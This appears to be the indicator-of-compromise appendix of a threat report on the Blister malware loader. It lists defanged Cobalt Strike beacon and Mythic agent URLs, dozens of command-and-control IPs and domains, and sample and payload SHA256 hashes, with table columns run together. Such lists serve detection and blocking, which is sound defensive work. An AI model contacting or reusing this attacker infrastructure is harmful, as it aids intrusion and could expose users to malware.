1101991775deep-linking[.]com/safebrowsing/fDeBjO/2hmXORzLK7PkevU1TehrmzD5z9
1101991775deep-linking[.]com/safebrowsing/fDeBjO/dMfdNUdgjjii3Ccalh10Mh4qyAFw5mS
1101991775deep-linking[.]com/safebrowsing/fDeBjO/vnZNyQrwUjndCPsCUXSaI
1101991775diggin-fzbvcfcyagemchbq.z01.azurefd[.]net/restore/how/3RG4G5T87
1101991775edubosi[.]com/safebrowsing/bsaGbO6l/ybGoI3wmK2uF9w9aL5qKmnS8IZIWsJqhp
1101991775e-sistem[.]com/Detect/devs/NJYO2MUY4V
1101991775ewebsofts[.]com/safebrowsing/3Tqo/UMskN3Lh0LyLy8BfpG1Bsvp
1101991775expreshon[.]com/safebrowsing/fDeBjO/2hmXORzLK7PkevU1TehrmzD5z9
1101991775eymenelektronik[.]com/safebrowsing/dfKa/B58qAhJ0AEF7aNwauoqpAL8
1101991775gotoknysna.com.global.prod.fastly[.]net/safebrowsing/fDeBjO/2hmXORzLK7PkevU1TehrmzD5z9
1101991775henzy-h6hxfpfhcaguhyf5.z01.azurefd[.]net/Detect/devs/NJYO2MUY4V
1101991775lepont-edu[.]com/safebrowsing/dfKa/9T1BuXpqEDg9tx53mQRU6
1101991775lindecolas[.]com/safebrowsing/d4alBmGBO/UaIzXMVGvV3tS2OJiKxSzyzbh4u1
1101991775lodhaamarathane[.]com/safebrowsing/dfKa/9T1BuXpqEDg9tx53mQRU6
1101991775mail-adv[.]com/safebrowsing/bsaGbO6l/dl1sskHxt1uGDGUnLDB5gxn4vYZQK1kaG6
1101991775mainecottagebythesea[.]com/functionalStatus/cjdl-CLe4j-XHyiEaDqQx
1101991775onscenephotos[.]com/restore/how/3RG4G5T87
1101991775promedia-usa[.]com/safebrowsing/d4alBmGBO/HafYg4QZaRhMBwuLAjVmSPc
1101991775python.docs.global.prod.fastly[.]net/Collect/union/QXMY8BHNIPH7
1101991775realitygangnetwork[.]com/functionalStatus/qPprp9dtVhrGV3R3re5Xy4M2cfQo4wB
1101991775realitygangnetwork[.]com/functionalStatus/vFi8EPnc9zJTD0GgRPxggCQAaNb
1101991775sanfranciscowoodshop[.]com/safebrowsing/dfKa/GgVYon5zhYu5L7inFbl1MZEv7RGOnsS00b
1101991775sohopf[.]com/apply/admin_/99ZSSAHDH
1101991775spanish-home-sales[.]com/safebrowsing/d4alBmGBO/EB-9sfMPmsHmH-A7pmll9HbV0g
1101991775steveandzina[.]com/safebrowsing/d4alBmGBO/mr3lHbohEvZa0mKDWWdwTV5Flsxh
1101991775steveandzina[.]com/safebrowsing/d4alBmGBO/YwTM1CK0mBV1Y7UDagpjP
1101991775websterbarn[.]com/safebrowsing/fDeBjO/CGZcHKnX3arVCfFp98k8
158010382410.158.128[.]50
1580103824bimelectrical[.]com/safebrowsing/7IAMO/hxNTeZ8lBNYqjAsQ2tBRS
1580103824bimelectrical[.]com/safebrowsing/7IAMO/Jwee0NMJNKn9sDD8sUEem4g8jcB2v44UINpCIj
1580103824bookmark-tag[.]com/safebrowsing/eMUgI4Z/3RzgDBAvgg3DQUn8XtN8l
1580103824braprest[.]com/safebrowsing/d5pERENa/3tPCoNwoGwXAvV1w1JAS-OOPyVYxL1K2styHFtbXar7ME
1580103824change-land[.]com/safebrowsing/TKc3hA/DzwHHcc8y8O9kAS7cl4SDK0e6z0KHKIX9w7
1580103824change-land[.]com/safebrowsing/TKc3hA/nLTHCIhzOKpdFp0GFHYBK-0bRwdNDlZz6Qc
1580103824clippershipintl[.]com/safebrowsing/sj0IWAb/YhcZADXFB3NHbxFtKgpqBtK9BllJiGEL
1580103824couponbrothers[.]com/safebrowsing/Jwjy4/mzAoZyZk7qHIyw3QrEpXij5WFhIo1z8JDUVA0N0
1580103824electronic-infinity[.]com/safebrowsing/TKc3hA/t-nAkENGu9rpZ9ebRRXr79b
1580103824final-work[.]com/safebrowsing/AvuvAkxsR/8I6ikMUvdNd8HOgMeD0sPfGpwSZEMr
1580103824geotypico[.]com/safebrowsing/d5pERENa/f5oBhEk7xS3cXxstp6Kx1G7u3N546UStcg9nEnzJn2k
1580103824imsensors[.]com/safebrowsing/eMUgI4Z/BOhKRIMsJsuPnn3IQvgrEc3XLQUB3W
1580103824intradayinvestment[.]com/safebrowsing/dpNqi/nXeFgGufr9VqHjDdsIZbw-ZH0
1580103824medicare-cost[.]com/safebrowsing/dpNqi/F3QExtY65SvTVK1ewA26
1580103824optiontradingsignal[.]com/safebrowsing/dpNqi/7CtHhF-isMMQ6m7NmHYNb0N7E7Fe
1580103824setechnowork[.]com/safebrowsing/fBm1b/JbcKDYjMWcQNjn69LnGggFe6mpjn5xOQ
1580103824sikescomposites[.]com/safebrowsing/Jwjy4/cmr4tZ7IyFGbgCiof2tHMO
1580103824technicollit[.]com/safebrowsing/b0kKKIjr/AzX9ZHB37oJfPsUBUaxBJjzzi132cYRZhUZc81g
1580103824wasfatsahla[.]com/safebrowsing/IsXNCJJfH/5x0rUIrn–r85sLJIuEY7C9q
206546002smutlr[.]com/functionalStatus/qPprp9dtVhrGV3R3re5Xy4M2cfQo4wB
206546002spanish-home-sales[.]com/functionalStatus/fb8ClEdmm-WwYudk-zODoQYB7DX3wQYR
Table 3, Information on observed Cobalt Strike beacons dropped by Blister.

BlisterMythic payloads

DomainURI
139-177-202-78.ip.linodeusercontent[.]com/etc.clientlibs/sapdx/front-layer/dist/resources/sapcom/919.9853a7ee629d48b1ddbe.js
23-92-30-58.ip.linodeusercontent[.]com/etc.clientlibs/sapdx/front-layer/dist/resources/sapcom/919.9853a7ee629d48b1ddbe.js
aviditycellars[.]com/etc.clientlibs/sapdx/front-layer/dist/resources/sapcom/919.9853a7ee629d48b1ddbe.js
boxofficeseer[.]com/s/0.7.8/clarity.js
d1hp6ufzqrj3xv.cloudfront[.]net/organizations/oauth2/v2.0/authorize
makethumbmoney[.]com/s/0.7.8/clarity.js
rosevalleylimousine[.]com/login.sophos.com/B2C_1A_signup_signin/api/SelfAsserted/confirmed
Table 4, Information on observed Mythic agents dropped by Blister.

BlisterMythic C2 servers

IPDomain
37.1.215[.]57angelbusinessteam[.]com
92.118.112[.]100danagroupegypt[.]com
104.238.60[.]11shchiswear[.]com
172.233.238[.]215N/a
96.126.111[.]127N/a
23.239.11[.]145N/a
45.33.98[.]254N/a
45.79.199[.]4N/a
45.56.105[.]98N/a
149.154.158[.]243futuretechfarm[.]com
104.243.33[.]161sms-atc[.]com
104.243.33[.]129makethumbmoney[.]com
138.124.180[.]241vectorsandarrows[.]com
94.131.101[.]58pacatman[.]com
198.58.119[.]214N/a
185.174.101[.]53personmetal[.]com
185.45.195[.]30aviditycellars[.]com
185.250.151[.]145bureaudecreationalienor[.]com
23.227.194[.]115bitscoinc[.]com
88.119.175[.]140boxofficeseer[.]com
88.119.175[.]137thesheenterprise[.]com
37.1.214[.]162remontisto[.]com
45.66.248[.]99N/a
88.119.175[.]104visioquote[.]com
45.66.248[.]13cannabishang[.]com
92.118.112[.]8turanmetal[.]com
37.1.211[.]150lucasdoors[.]com
185.72.8[.]219displaymercials[.]com
172.232.172[.]128N/a
82.117.253[.]168digtupu[.]com
104.238.60[.]112avblokhutten[.]com
173.44.141[.]34hom4u[.]com
170.130.165[.]140rosevalleylimousine[.]com
172.232.172[.]110N/a
5.8.63[.]79boezgrt[.]com
172.232.172[.]125N/a
162.248.224[.]56hatchdesignsnh[.]com
185.174.101[.]13formulaautoparts[.]com
23.152.0[.]193ivermectinorder[.]com
192.169.6[.]200szdeas[.]com
194.87.32[.]85licencesolutions[.]com
185.45.195[.]205motorrungoli[.]com
Table 5, Detected BlisterMythic C2 servers

Blister samples

SHA256Payload familyPayload SHA256
0a73a9ee3650821352d9c4b46814de8f73fde659cae6b82a11168468becb68d1Cobalt Strike397c08f5cdc59085a48541c89d23a8880d41552031955c4ba38ff62e57cfd803
0bbf1a3a8dd436fda213bc126b1ad0b8704d47fd8f14c75754694fd47a99526cBlisterMythicab7cab5192f0bef148670338136b0d3affe8ae0845e0590228929aef70cb9b8b
0e8458223b28f24655caf37e5c9a1c01150ac7929e6cb1b11d078670da892a5bCobalt Strike4420bd041ae77fce2116e6bd98f4ed6945514fad8edfbeeeab0874c84054c80a
0f07c23f7fe5ff918ee596a7f1df320ed6e7783ff91b68c636531aba949a6f33Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
a3cb53ddd4a5316cb02b7dc4ccd1f615755b46e86a88152a1f8fc59efe170497Cobalt Strikee85a2e8995ef37acf15ea79038fae70d4566bd912baac529bad74fbec5bb9c21
a403b82a14b392f8485a22f105c00455b82e7b8a3e7f90f460157811445a8776Cobalt Strikee0c0491e45dda838f4ac01b731dd39cc7064675a6e1b79b184fff99cdce52f54
a5fc8d9f9f4098e2cecb3afc66d8158b032ce81e0be614d216c9deaf20e888acTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
a9ea85481e178cd35ae323410d619e97f49139dcdb2e7da72126775a89a8464fCobalt Strikec7accad7d8da9797788562a3de228186290b0f52b299944bec04a95863632dc0
ac232e7594ce8fbbe19fc74e34898c562fe9e8f46d4bfddc37aefeb26b85c02bCobalt Strike obfuscated shellcodecef1a88dfc436dab9ae104f0770a434891bbd609e64df43179b42b03a7e8f908
acdaac680e2194dd8fd06f937847440e7ab83ce1760eab028507ee8eba557291Cobalt Strikeb96d4400e9335d80dedee6f74ffaa4eca9ffce24c370790482c639df52cb3127
ae148315cec7140be397658210173da372790aa38e67e7aa51597e3e746f2cb2Cobalt Strikef245b2bc118c3c20ed96c8a9fd0a7b659364f9e8e2ee681f5683681e93c4d78b
aeecc65ac8f0f6e10e95a898b60b43bf6ba9e2c0f92161956b1725d68482721dCobalt Strike797abd3de3cb4c7a1ceb5de5a95717d84333bedcbc0d9e9776d34047203181bc
b062dd516cfa972993b6109e68a4a023ccc501c9613634468b2a5a508760873eCobalt Strike122b77fd4d020f99de66bba8346961b565e804a3c29d0757db807321e9910833
b10db109b64b798f36c717b7a050c017cf4380c3cb9cfeb9acd3822a68201b5bCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
b1d1a972078d40777d88fb4cd6aef1a04f29c5dd916f30a6949b29f53a2d121cPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
b1f3f1c06b1cc9a249403c2863afc132b2d6a07f137166bdd1e4863a0cece5b1Cobalt Strikee63807daa9be0228d90135ee707ddf03b0035313a88a78e50342807c27658ff2
b4c746e9a49c058ae3843799cdd6a3bb5fe14b413b9769e2b5a1f0f846cb9d37Cobalt Strike stager063191c49d49e6a8bdcd9d0ee2371fb1b90f1781623827b1e007e520ec925445
b4f37f13a7e9c56ea95fa3792e11404eb3bdb878734f1ca394ceed344d22858fTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
b956c5e8ec6798582a68f24894c1e78b9b767aae4d5fb76b2cc71fc9c8befed8Cobalt Strike6fc283acfb7dda7bab02f5d23dc90b318f4c73a8e576f90e1cac235bf8d02470
b99ba2449a93ab298d2ec5cacd5099871bacf6a8376e0b080c7240c8055b1395Cobalt Strike96fab57ef06b433f14743da96a5b874e96d8c977b758abeeb0596f2e1222b182
b9e313e08b49d8d2ffe44cb6ec2192ee3a1c97b57c56f024c17d44db042fb9ebTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
bc238b3b798552958009f3a4ce08e5ce96edff06795281f8b8de6f5df9e4f0feCobalt Strike stager191566d8cc119cd6631d353eab0b8c1b8ba267270aa88b5944841905fa740335
bcd64a8468762067d8a890b0aa7916289e68c9d8d8f419b94b78a19f5a74f378Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
c113e8a1c433b4c67ce9bce5dea4b470da95e914de4dc3c3d5a4f98bce2b7d6cPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
c1261f57a0481eb5d37176702903025c5b01a166ea6a6d42e1c1bdc0e5a0b04bCobalt Strike obfuscated shellcode189b7afdd280d75130e633ebe2fcf8f54f28116a929f5bb5c9320f11afb182d4
c149792a5e5ce4c15f8506041e2f234a9a9254dbda214ec79ceef7d0911a3095Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
c2046d64bcfbab5afcb87a75bf3110e0fa89b3e0f7029ff81a335911cf52f00aCobalt Striked048001f09ad9eedde44f471702a2a0f453c573db9c8811735ec45d65801f1d0
c3509ba690a1fcb549b95ad4625f094963effc037df37bd96f9d8ed5c7136d94Cobalt Strikee0c0491e45dda838f4ac01b731dd39cc7064675a6e1b79b184fff99cdce52f54
c3cfbede0b561155062c2f44a9d44c79cdb78c05461ca50948892ff9a0678f3fCobalt Strikebcb32a0f782442467ea8c0bf919a28b58690c68209ae3d091be87ef45d4ef049
c79ab271d2abd3ee8c21a8f6ad90226e398df1108b4d42dc551af435a124043cCobalt Strike749d061acb0e584df337aaef26f3b555d5596a96bfffc9d6cd7421e22c0bacea
cab95dc6d08089dcd24c259f35b52bca682635713c058a74533501afb94ab91fPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
cea5c060dd8abd109b478e0de481f0df5ba3f09840746a6a505374d526bd28dcMythicPacker759ac6e54801e7171de39e637b9bb525198057c51c1634b09450b64e8ef47255
cfa604765b9d7a93765d46af78383978251486d9399e21b8e3da4590649c53e4Cobalt Strike stager57acdb7a22f5f0c6d374be2341dbef97efbcc61f633f324beb0e1214614fef82
d1afca36f67b24eae7f2884c27c812cddc7e02f00f64bb2f62b40b21ef431084Cobalt Strikef570bd331a3d75e065d1825d97b922503c83a52fc54604d601d2e28f4a70902b
d1b6671fc0875678ecf39d737866d24aca03747a48f0c7e8855a5b09fc08712dTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
d3d48aa32b062b6e767966a8bab354eded60e0a11be5bc5b7ad8329aa5718c76Cobalt Strike60905c92501ec55883afc3f6402a05bddfd335323fdc0144515f01e8da0acbda
d3eab2a134e7bd3f2e8767a6285b38d19cd3df421e8af336a7852b74f194802cBlisterMythic2fd38f6329b9b2c5e0379a445e81ece43fe0372dec260c1a17eefba6df9ffd55
d439f941b293e3ded35bf52fac7f20f6a2b7f2e4b189ad2ac7f50b8358110491Cobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
dac00ec780aabaffed1e89b3988905a7f6c5c330218b878679546a67d7e0eef2Cobalt Strikeadc73af758c136e5799e25b4d3d69e462e090c8204ec8b8f548e36aac0f64a66
db62152fe9185cbd095508a15d9008b349634901d37258bc3939fe3a563b4b3cMythicPacker7f71d316c197e4e0aa1fce9d40c6068ada4249009e5da51479318de039973ad8
db81e91fc05991f71bfd5654cd60b9093c81d247ccd8b3478ab0ebef61efd2adPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
dd42c1521dbee54173be66a5f98a811e5b6ee54ad1878183c915b03b68b7c9bbCobalt Striked988a867a53c327099a4c9732a1e4ced6fe6eca5dd68f67e5f562ab822b8374b
e0888b80220f200e522e42ec2f15629caa5a11111b8d1babff509d0da2b948f4Cobalt Strike915503b4e985ab31bc1d284f60003240430b3bdabb398ae112c4bd1fe45f3cdd
e30503082d3257737bba788396d7798e27977edf68b9dba7712a605577649ffbCobalt Strikedf01b0a8112ca80daf6922405c3f4d1ff7a8ff05233fc0786e9d06e63c9804d6
e521cad48d47d4c67705841b9c8fa265b3b0dba7de1ba674db3a63708ab63201Cobalt Strike stager40cac28490cddfa613fd58d1ecc8e676d9263a46a0ac6ae43bcbdfedc525b8ee
e62f5fc4528e323cb17de1fa161ad55eb451996dec3b31914b00e102a9761a52Cobalt Strike19e7bb5fa5262987d9903f388c4875ff2a376581e4c28dbf5ae7d128676b7065
ebafb35fd9c7720718446a61a0a1a10d09bf148d26cdcd229c1d3d672835335cCobalt Strike5cb2683953b20f34ff26ddc0d3442d07b4cd863f29ec3a208cbed0dc760abd04
ebf40e12590fcc955b4df4ec3129cd379a6834013dae9bb18e0ec6f23f935bbaCobalt Striked99bac48e6e347fcfd56bbf723a73b0b6fb5272f92a6931d5f30da76976d1705
ef7ff2d2decd8e16977d819f122635fcd8066fc8f49b27a809b58039583768d2Cobalt Strikeadc73af758c136e5799e25b4d3d69e462e090c8204ec8b8f548e36aac0f64a66
efbffc6d81425ffb0d81e6771215c0a0e77d55d7f271ec685b38a1de7cc606a8Cobalt Strike47bd5fd96c350f5e48f5074ebee98e8b0f4efb8a0cd06db5af2bdc0f3ee6f44f
f08fdb0633d018c0245d071fa79cdc3915da75d3c6fc887a5ca6635c425f163aTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
f3bfd8ab9e79645babf0cb0138d51368fd452db584989c4709f613c93caf2bdcCobalt Strikecd7135c94929f55e19e5d66359eab46422c3c59d794dde00c8b4726498e4e01a
f58de1733e819ea38bce21b60bb7c867e06edb8d4fd987ab09ecdbf7f6a319b9MythicPacker19eae7c0b7a1096a71b595befa655803c735006d75d5041c0e18307bd967dee6
f7fa532ad074db4a39fd0a545278ea85319d08d8a69c820b081457c317c0459eCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
fce9de0a0acf2ba65e9e252a383d37b2984488b6a97d889ec43ab742160acce1Cobalt Strike stager40cac28490cddfa613fd58d1ecc8e676d9263a46a0ac6ae43bcbdfedc525b8ee
ffb255e7a2aa48b96dd3430a5177d6f7f24121cc0097301f2e91f7e02c37e6bfCobalt Strike5af6626a6bc7265c21adaffb23cc58bc52c4ebfe5bf816f77711d3bc7661c3d6
1a50c358fa4b725c6e0e26eee3646de26ba38e951f3fe414f4bf73532af62455Cobalt Strike8f1cc6ab8e95b9bfdf22a2bde77392e706b6fb7d3c1a3711dbc7ccd420400953
1be3397c2a85b4b9a5a111b9a4e53d382df47a0a09065639d9e66e0b55fe36fcCobalt Strike stager3f28a055d56f46559a21a2b0db918194324a135d7e9c44b90af5209a2d2fd549
1d058302d1e747714cac899d0150dcc35bea54cc6e995915284c3a64a76aacb1Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
02b1bd89e9190ff5edfa998944fd6048d32a3bde3a72d413e8af538d9ad770b4Cobalt Strike obfuscated shellcode3760db55a6943f4216f14310ab10d404e5c0a53b966dd634b76dd669f59d2507
2cf125d6f21c657f8c3732be435af56ccbe24d3f6a773b15eccd3632ea509b1aPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
2f2e62c9481ba738a5da7baadfc6d029ef57bf7a627c2ac0b3e615cab5b0cfa2Cobalt Strike39ed516d8f9d9253e590bad7c5daecce9df21f1341fb7df95d7caa31779ea40f
3bc8ce92409876526ad6f48df44de3bd1e24a756177a07d72368e2d8b223bb39Cobalt Strike20e43f60a29bab142f050fab8c5671a0709ee4ed90a6279a80dd850e6f071464
3dffb7f05788d981efb12013d7fadf74fdf8f39fa74f04f72be482847c470a53Cobalt Strike8e78ad0ef549f38147c6444910395b053c533ac8fac8cdaa00056ad60b2a0848
3f6e3e7747e0b1815eb2a46d79ebd8e3cb9ccdc7032d52274bc0e60642e9b31ePutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
3fff407bc45b879a1770643e09bb99f67cdcfe0e4f7f158a4e6df02299bac27eTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
4b3cd3aa5b961791a443b89e281de1b05bc3a9346036ec0da99b856ae7dc53a8Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
4faf362b3fe403975938e27195959871523689d0bf7fba757ddfa7d00d437fd4Cobalt Strike60905c92501ec55883afc3f6402a05bddfd335323fdc0144515f01e8da0acbda
5d72cc2e47d3fd781b3fc4e817b2d28911cd6f399d4780a5ff9c06c23069eae1MythicPacker9a08d2db7d0bd7d4251533551d4def0f5ee52e67dff13a2924191c8258573024
5ea74bca527f7f6ea8394d9d78e085bed065516eca0151a54474fffe91664198Cobalt Strikebe314279f817f9f000a191efb8bcc2962fcc614b1f93c73dda46755269de404f
5fc79a4499bafa3a881778ef51ce29ef015ee58a587e3614702e69da304395dbBlisterMythic3d2499e5c9b46f1f144cfbbd4a2c8ca50a3c109496a936550cbb463edf08cd79
06cd6391b5fcf529168dc851f27bf3626f20e038a9c0193a60b406ad1ece6958Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
6a7ae217394047c17d56ec77b2243d9b55617a1ff591d2c2dfc01f2da335cbbfMythicPacker1e3b373f2438f1cc37e15fdede581bdf2f7fc22068534c89cb4e0c128d0e45dd
6e75a9266e6bbfd194693daf468dd86d106817706c57b1aad95d7720ac1e19e3Cobalt Strike4adf3875a3d8dd3ac4f8be9c83aaa7e3e35a8d664def68bc41fc539bfedfd33f
7e61498ec5f0780e0e37289c628001e76be88f647cad7a399759b6135be8210aTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
7f7b9f40eea29cfefc7f02aa825a93c3c6f973442da68caf21a3caae92464127Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
8b6eb2853ae9e5faff4afb08377525c9348571e01a0e50261c7557d662b158e1Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
8d53dc0857fa634414f84ad06d18092dedeb110689a08426f08cb1894c2212d4Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
8e6c0d338f201630b5c5ba4f1757e931bc065c49559c514658b4c2090a23e57bCobalt Strikef2329ae2eb28bba301f132e5923282b74aa7a98693f44425789b18a447a33bff
8f9289915b3c6f8bf9a71d0a2d5aeb79ff024c108c2a8152e3e375076f3599d5BlisterMythicf89cfbc1d984d01c57dd1c3e8c92c7debc2beb5a2a43c1df028269a843525a38
9c5c9d35b7c2c448a610a739ff7b85139ea1ef39ecd9f51412892cd06fde4b1bTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
13c7f28044fdb1db2289036129b58326f294e76e011607ca8d4c5adc2ddddb16Cobalt Strike19e7bb5fa5262987d9903f388c4875ff2a376581e4c28dbf5ae7d128676b7065
19b0db9a9a08ee113d667d924992a29cd31c05f89582953eff5a52ad8f533f4bTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
19d4a7d08176119721b9a302c6942718118acb38dc1b52a132d9cead63b11210Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
22e65a613e4520a6f824a69b795c9f36af02247f644e50014320857e32383209Cobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
028da30664cb9f1baba47fdaf2d12d991dcf80514f5549fa51c38e62016c1710Cobalt Strike8e78ad0ef549f38147c6444910395b053c533ac8fac8cdaa00056ad60b2a0848
37b6fce45f6bb52041832eaf9c6d02cbc33a3ef2ca504adb88e19107d2a7aeaaCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
42beac1265e0efc220ed63526f5b475c70621573920968a457e87625d66973afTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
43c1ee0925ecd533e0b108c82b08a3819b371182e93910a0322617a8acf26646Cobalt Strike5cb2683953b20f34ff26ddc0d3442d07b4cd863f29ec3a208cbed0dc760abd04
44ce7403ca0c1299d67258161b1b700d3fa13dd68fbb6db7565104bba21e97aeMythicPackerf3b0357562e51311648684d381a23fa2c1d0900c32f5c4b03f4ad68f06e2adc1
49ba10b4264a68605d0b9ea7891b7078aeef4fa0a7b7831f2df6b600aae77776Cobalt Strike0603cf8f5343723892f08e990ae2de8649fcb4f2fd4ef3a456ef9519b545ed9e
54c7c153423250c8650efc0d610a12df683b2504e1a7a339dfd189eda25c98d4Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
58fdee05cb962a13c5105476e8000c873061874aadbc5998887f0633c880296aTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
73baa040cd6879d1d83c5afab29f61c3734136bffe03c72f520e025385f4e9a2Cobalt Strike17392d830935cfad96009107e8b034f952fb528f226a9428718669397bafd987
78d93b13efd0caa66f5d91455028928c3b1f44d0f2222d9701685080e30e317dPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
83c121db96d99f0d99b9e7a2384386f3f6debcb01d977c4ddca5bcdf2c6a2daaCobalt Strike stager39323f9c0031250414cb4683662e1c533960dea8a54d7a700f77c6133a59c783
84b245fce9e936f1d0e15d9fca8a1e4df47c983111de66fcc0ad012a63478c8dCobalt Strike stagerd961e9db4a96c87226dbc973658a14082324e95a4b30d4aae456a8abe38f5233
84b2d16124b690d77c5c43c3a0d4ad78aaf10d38f88d9851de45d6073d8fcb65Cobalt Strike0091186459998ad5b699fdd54d57b1741af73838841c849c47f86601776b0b33
85d3f81a362a3df9ba2f0a00dd12cd654e55692feffc58782be44f4c531d9bb9Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
96e8b44ec061c49661bd192f279f7b7ba394d03495a2b46d3b37dcae0f4892f1Cobalt Strike stager6f7d7da247cac20d5978f1257fdd420679d0ce18fd8738bde02246129f93841b
96ebacf48656b804aed9979c2c4b651bbb1bc19878b56bdf76954d6eff8ad7caCobalt Striked988a867a53c327099a4c9732a1e4ced6fe6eca5dd68f67e5f562ab822b8374b
113c9e7760da82261d77426d9c41bc108866c45947111dbae5cd3093d69e0f1dPutty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
149c3d044abc3c3a15ba1bb55db7e05cbf87008bd3d23d7dd4a3e31fcfd7af10Cobalt Strikee63807daa9be0228d90135ee707ddf03b0035313a88a78e50342807c27658ff2
307fc7ebde82f660950101ea7b57782209545af593d2c1115c89f328de917dbbCobalt Strike stager40cac28490cddfa613fd58d1ecc8e676d9263a46a0ac6ae43bcbdfedc525b8ee
356efe6b10911d7daaffed64278ba713ab51f7130d1c15f3ca86d17d65849fa5Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
394ce0385276acc6f6c173a3dde6694881130278bfb646be94234cc7798fd9a9Cobalt Strike60e2fe4eb433d3f6d590e75b2a767755146aca7a9ba6fd387f336ccb3c5391f8
396dce335b16111089a07ecb2d69827f258420685c2d9f3ea9e1deee4bff9561Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
541eab9e348c40d510db914387068c6bfdf46a6ff84364fe63f6e114af8d79cfCobalt Strike stager4e2a011922e0060f995bfde375d75060bed00175dc291653445357b29d1afc38
745a3dcdda16b93fedac8d7eefd1df32a7255665b8e3ee71e1869dd5cd14d61cCobalt Strike obfuscated shellcodecef1a88dfc436dab9ae104f0770a434891bbd609e64df43179b42b03a7e8f908
753f77134578d4b941b8d832e93314a71594551931270570140805675c6e9ad3Putty0581160998be30f79bd9a0925a01b0ebc4cb94265dfa7f8da1e2839bf0f1e426
863de84a39c9f741d8103db83b076695d0d10a7384e4e3ba319c05a6018d9737Cobalt Strike3a1e65d7e9c3c23c41cb1b7d1117be4355bebf0531c7473a77f957d99e6ad1d4
902fa7049e255d5c40081f2aa168ac7b36b56041612150c3a5d2b6df707a3cffCobalt Strike397c08f5cdc59085a48541c89d23a8880d41552031955c4ba38ff62e57cfd803
927e04371fa8b8d8a1de58533053c305bb73a8df8765132a932efd579011c375Cobalt Strike2e0767958435dd4d218ba0bc99041cc9f12c9430a09bb1222ac9d1b7922c2632
2043d7f2e000502f69977b334e81f307e2fda742bbc5b38745f6c1841757fddcTest application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
02239cac2ff37e7f822fd4ee57ac909c9f541a93c27709e9728fef2000453afeCobalt Strike18a9eafb936bf1d527bd4f0bfae623400d63671bafd0aad0f72bfb59beb44d5f
4257bf17d15358c2f22e664b6112437b0c2304332ff0808095f1f47cf29fc1a2Cobalt Strike3a1e65d7e9c3c23c41cb1b7d1117be4355bebf0531c7473a77f957d99e6ad1d4
6558ac814046ecf3da8c69affea28ce93524f93488518d847e4f03b9327acb44Test application43308bde79e71b2ed14f318374a80fadf201cc3e34a887716708635294031b1b
8450ed10b4bef6f906ff45c66d1a4a74358d3ae857d3647e139fdaf0e3648c10BlisterMythicab7cab5192f0bef148670338136b0d3affe8ae0845e0590228929aef70cb9b8b
9120f929938cd629471c7714c75d75d30daae1f2e9135239ea5619d77574c1feCobalt Strike647e992e24e18c14099b68083e9b04575164ed2b4f5069f33ff55f84ee97fff0
28561f309d208e885a325c974a90b86741484ba5e466d59f01f660bed1693689Cobalt Strike397c08f5cdc59085a48541c89d23a8880d41552031955c4ba38ff62e57cfd803
30628bcb1db7252bf710c1d37f9718ac37a8e2081a2980bead4f21336d2444bcCobalt Strike obfuscated shellcode13f23b5db4a3d0331c438ca7d516d565a08cac83ae515a51a7ab4e6e76b051b1
53121c9c5164d8680ae1b88d95018a553dff871d7b4d6e06bd69cbac047fe00fCobalt Strike902d29871d3716113ca2af5caa6745cb4ab9d0614595325c1107fb83c1494483
67136ab70c5e604c6817105b62b2ee8f8c5199a647242c0ddbf261064bb3ced3Cobalt Strike obfuscated shellcode0aecd621b386126459b39518f157ee240866c6db1885780470d30a0ebf298e16
